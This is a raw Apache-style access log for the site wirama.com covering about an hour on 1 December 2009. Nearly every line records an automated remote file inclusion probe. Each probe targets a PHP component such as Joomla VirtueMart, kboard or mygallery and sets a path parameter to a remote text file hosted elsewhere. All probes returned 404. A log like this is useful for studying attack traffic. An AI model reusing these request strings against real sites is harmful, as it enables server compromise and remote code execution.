77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:29:46 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:30:39 -0800] "GET /logs/access_090501.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:30:40 -0800] "GET /logs/access_090501.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:30:44 -0800] "GET /logs/access_090501.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:30:44 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:30:44 -0800] "GET /include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.74.245.40 - - [01/Dec/2009:00:31:01 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.wirama.com"
77.221.130.11 - - [01/Dec/2009:00:31:08 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:31:08 -0800] "GET /logs/access_090901.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:31:11 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:31:17 -0800] "GET /logs/access_090901.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:31:20 -0800] "GET /logs/access_090731.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:31:20 -0800] "GET /logs/access_090501.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:31:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.11 - - [01/Dec/2009:00:31:22 -0800] "GET /logs/access_090731.log//skin/zero_vote/error.php?dir=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:31:23 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:31:58 -0800] "GET /logs/access_090731.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:10 -0800] "GET /include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:10 -0800] "GET /logs/access_090501.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:13 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:25 -0800] "GET /logs/access_090731.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:38 -0800] "GET /include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:38 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:38 -0800] "GET /logs/access_090501.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:32:44 -0800] "GET /logs/access_090731.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
194.150.253.152 - - [01/Dec/2009:00:33:25 -0800] "GET /logs/access_090731.log//include/admin.lib.inc.php?site_path=http://aop.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
205.234.184.42 - - [01/Dec/2009:00:42:13 -0800] "GET /logs/access_090801.log/error.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
205.234.184.42 - - [01/Dec/2009:00:42:14 -0800] "GET /error.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
205.234.184.42 - - [01/Dec/2009:00:42:14 -0800] "GET /logs/error.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:00:47:12 -0800] "GET /logs/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:00:47:12 -0800] "GET /logs/access_090801.log%20%20/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:00:47:12 -0800] "GET /error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:00:47:23 -0800] "GET /logs/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:00:47:23 -0800] "GET /error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:00:47:23 -0800] "GET /logs/access_090801.log%20%20/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
208.116.0.130 - - [01/Dec/2009:00:54:11 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.agio.it/dynamic/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
208.116.0.130 - - [01/Dec/2009:00:54:11 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.agio.it/dynamic/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
77.221.130.13 - - [01/Dec/2009:00:54:31 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.13 - - [01/Dec/2009:00:54:31 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.13 - - [01/Dec/2009:00:54:31 -0800] "GET /logs/access_090330.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.13 - - [01/Dec/2009:00:55:59 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.13 - - [01/Dec/2009:00:55:59 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.13 - - [01/Dec/2009:00:55:59 -0800] "GET /logs/access_090330.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:00:57:14 -0800] "GET /logs/access.log/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:00:57:14 -0800] "GET /error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:00:57:14 -0800] "GET /logs/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:00:58:38 -0800] "GET /error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:00:58:38 -0800] "GET /logs/access.log/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:00:58:38 -0800] "GET /logs/error.php?dir=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.13 - - [01/Dec/2009:00:59:20 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.13 - - [01/Dec/2009:00:59:20 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
77.221.130.13 - - [01/Dec/2009:00:59:20 -0800] "GET /logs/access_090330.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.193.106.56 - - [01/Dec/2009:00:59:35 -0800] "GET /logs/access_090501.log///include/admin.lib.inc.php?site_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:00:59:35 -0800] "GET //include/admin.lib.inc.php?site_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:00:59:35 -0800] "GET /logs///include/admin.lib.inc.php?site_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.106.56 - - [01/Dec/2009:00:59:57 -0800] "GET /logs/access_090731.log///include/admin.lib.inc.php?site_path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:01:02:43 -0800] "GET /logs/access_090501.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:01:02:43 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
80.82.115.41 - - [01/Dec/2009:01:02:43 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
77.221.130.13 - - [01/Dec/2009:01:02:48 -0800] "GET /logs/access_090329.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://ioct.cbnu.ac.kr//bbs/skin/zero_vote/10.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
205.234.184.42 - - [01/Dec/2009:01:03:32 -0800] "GET /logs/access_090801.log%20/error.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:01:16:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:01:16:32 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:01:16:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:01:24:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:01:24:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
80.82.115.41 - - [01/Dec/2009:01:24:49 -0800] "GET /logs/access_090731.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://karafoodservice.com.au/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
205.234.184.42 - - [01/Dec/2009:01:24:58 -0800] "GET /error.php?dir=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:12 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:12 -0800] "GET /logs/access_090731.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:12 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /logs/access_090731.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /logs/access_090731.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:01:25:13 -0800] "GET /logs/access_090731.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:39 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:39 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:40 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:40 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:40 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:42 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:42 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:42 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:43 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:43 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:44 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:44 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:47 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:48 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:48 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:49 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:49 -0800] "GET /logs/access_090731.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:50 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:50 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:54 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:31:56 -0800] "GET /logs/access_090801.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
91.192.20.164 - - [01/Dec/2009:01:32:53 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:32:53 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:32:53 -0800] "GET /logs/access_090801.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
91.192.20.164 - - [01/Dec/2009:01:33:06 -0800] "GET /logs/access_090801.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.tongrentangkj.com/images/smilies/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
